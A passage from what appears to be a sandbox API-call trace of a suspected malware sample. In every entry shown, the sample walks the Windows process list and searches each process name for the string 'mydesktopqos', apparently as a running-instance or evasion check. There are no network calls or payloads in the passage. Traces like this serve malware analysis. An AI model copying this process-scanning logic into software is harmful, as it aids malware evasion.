lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.439] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.439] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.441] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573320 [0095.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573320, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.441] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.441] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.441] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.443] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573248 [0095.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573248, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.443] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.443] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.443] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.444] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35732f0 [0095.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35732f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.444] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.444] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.444] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.445] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573110 [0095.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573110, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.445] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.445] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.447] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573368 [0095.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573368, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.447] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.447] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.448] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573290 [0095.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573290, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.448] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.448] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.448] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.449] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573128 [0095.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573128, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.449] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.449] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.451] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35731d0 [0095.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35731d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.451] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.451] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.451] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0095.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.452] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573260 [0095.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3573260, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0095.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0095.452] StrStrIA (lpFirst="spoolsv.exe", lpSrch="mydesktopqos") returned 0x0 [0095.452] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.453] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573158 [0095.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.454] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.454] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.454] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.455] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573140 [0095.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3573140, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0095.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0095.455] StrStrIA (lpFirst="audiodg.exe", lpSrch="mydesktopqos") returned 0x0 [0095.455] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0095.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.456] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3573308 [0095.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3573308, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0095.457] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0095.457] StrStrIA (lpFirst="sihost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.457] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.458] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573338 [0095.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3573338, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0095.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0095.458] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.458] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0095.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.459] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573350 [0095.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3573350, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0095.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0095.459] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mydesktopqos") returned 0x0 [0095.460] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0095.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.461] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573080 [0095.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3573080, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0095.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0095.461] StrStrIA (lpFirst="explorer.exe", lpSrch="mydesktopqos") returned 0x0 [0095.461] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0095.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.462] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35748e8 [0095.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35748e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0095.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0095.462] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="mydesktopqos") returned 0x0 [0095.462] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0095.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0095.464] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356ad08 [0095.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356ad08, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0095.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0095.464] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="mydesktopqos") returned 0x0 [0095.464] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0095.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.465] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3574b28 [0095.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3574b28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0095.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0095.465] StrStrIA (lpFirst="Memory Compression", lpSrch="mydesktopqos") returned 0x0 [0095.465] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0095.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0095.467] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3574be8 [0095.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3574be8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0095.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0095.467] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="mydesktopqos") returned 0x0 [0095.467] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0095.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.487] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573278 [0095.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3573278, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0095.487] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0095.487] StrStrIA (lpFirst="SearchUI.exe", lpSrch="mydesktopqos") returned 0x0 [0095.487] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0095.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0095.489] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3574b48 [0095.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3574b48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0095.489] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0095.489] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="mydesktopqos") returned 0x0 [0095.489] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0095.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.490] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573188 [0095.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3573188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0095.490] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0095.490] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mydesktopqos") returned 0x0 [0095.490] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0095.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.491] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35731e8 [0095.491] 